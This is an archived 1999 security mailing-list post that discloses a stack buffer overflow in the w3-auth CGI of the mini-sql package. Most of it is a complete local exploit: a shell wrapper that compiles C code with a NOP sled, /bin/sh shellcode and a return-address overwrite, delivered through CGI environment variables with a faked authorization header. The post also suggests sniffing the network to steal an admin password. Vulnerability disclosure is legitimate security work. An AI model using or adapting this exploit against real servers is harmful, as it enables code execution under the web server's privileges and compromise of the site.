mini-sql Buffer Overflow

[gdn () NEUROCOM COM (gregory duchemin)]

hi,

i was looking for an exploitable buffer overflow in w3-msql 
(from Hughes Technology) since there was many security flaws 
inside.
There is a static variable named PrivateScript in main() 
function with a 255 chars size length.
No luck ! main() finish everywhere with an exit() call.
The http internal server error produced with a big URI 
string (about 260 chars) is the fact of the modification of 
environments pointers in the stack just behind the return 
adress and argvs pointers.
So the syscall getenv() produce a signal 11.

No mind ! just take a look now in w3-auth.c :)
and more specially in parseArgs().

there is a static array of 30 chars named "var" and the 
function exit with a return.
this is ok !
It 's now possible to force remotly w3-auth cgi-bin to 
execute everything with httpd user priviledge (and may be, 
to modify everything in the web server)
However to exploit this hole, attacker has to be 
authenticated by the cgi (the web server has to set 
HTTP_AUTHORIZATION environment var).
So there are two ways to use this exploit:

1- the hacker is an official msql database admin but without 
httpd priviledge (naturally !)
2- the hacker starts by sniffing the network segment, steals 
an admin password and modify remotly the web server.

now the script (local version only, just the necessary time
for Hughes to patch the source) 

#!/bin/sh

cat > ./w3-3gg.c  << _EOEXPLOIT

/*******************************
      *****************

Local Linux exploit for 
w3-auth 
Authentication module from mini-sql package

Gregory Duchemin Aka c3RbeR

Neurocom --  Mai 1999
E-mail: gdn () neurocom com

     ******************
********************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/param.h>
#include <stdarg.h>

#define GREEN "\033[1;32m"
#define RED "\033[1;31m"
#define NORM "\033[1;39m"
#define NOP 0x90

char *EGG;
char *bob;
long *ret;
int size;

long StackPointer();
int usage(char *);
void Thisistheend(long);

/*
Shellk0de from the great Phr4ck Ezine
*/

char shell[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x5
6\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd
1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

int main (int argc, char *argv[]){
int cnt;
unsigned long sp;
int dec;
sp = cnt = 0;

if (argc>=4) usage(argv[0]);

size=250;
if (argc>=2) size=atoi(argv[1]);

dec=15;
if (argc>=3) dec=atoi(argv[2]);
sp=StackPointer();
sp-=dec;

printf("%s\n Using buffer size = %d, return adress = %02X 
with stack offset = 
%d\n\n", GREEN, size, sp, dec);
Thisistheend(sp);
}

/* Wh3re is my Stack P0inter ? Ask the esp registry... */ 

long StackPointer()
{
 __asm__("movl %esp, %eax\n"); 
}

int usage (char *name) 
{
printf("%s Usage:%s [size] [offset] \n",RED,name);
printf("Default: %s 250 15 \n %s",name, NORM);
exit(1);
}

void Thisistheend (long sp) 
{
int cnt;

if (!(EGG=(char *)malloc(size))) 
    {
        perror("Malloc error\n\n");
        exit(1);
    }

/* First Step....filling buffer with NoOperation */

for(cnt=0;cnt<(size-1);cnt++)
*(EGG+cnt)=NOP;

/* Next, insert your own code */

bob=EGG+80;
for (cnt=0; cnt<strlen(shell); cnt++)
*(bob++)=*(shell+cnt);

/* Then, your return adress in the stack to point toward the 
shell code */ 

ret = (unsigned long *) (EGG+36);
*(ret)=sp;

EGG[size-1]='\0';

/* 
apache set this env variables
Note: "Http authentication" means that script kiddy'll have 
to get a pass
*/

setenv("REQUEST_METHOD", "GET", 1);
setenv("HTTP_USER_AGENT", EGG, 1); 
setenv("QUERY_STRING", EGG, 1); 

/* Simulate a good authentication localy */

setenv("HTTP_AUTHORIZATION", "1", 1);

system("/bin/sh -c \"echo -e \'\nReady to fight captain 
!\n\nLook at the env(s) and 
...\n\nJust launch w3-auth and see...\n\n\n\'\"");
system("/bin/sh");
}
_EOEXPLOIT

gcc ./w3-3gg.c -o ./w3-3gg
echo -e "\n\n Script started \n\n"
./w3-3gg
rm ./w3-3gg ./w3-3gg.c

-------------------------------

  Gregory Duchemin

  Security Engineer

  NEUROCOM
  179-181 Av Charles de Gaulle
  92200 Neuilly sur Seine
  Tel: 01 41 43 84 84
  Fax: 01 41 43 84 80

  E-mail: gdn () neurocom com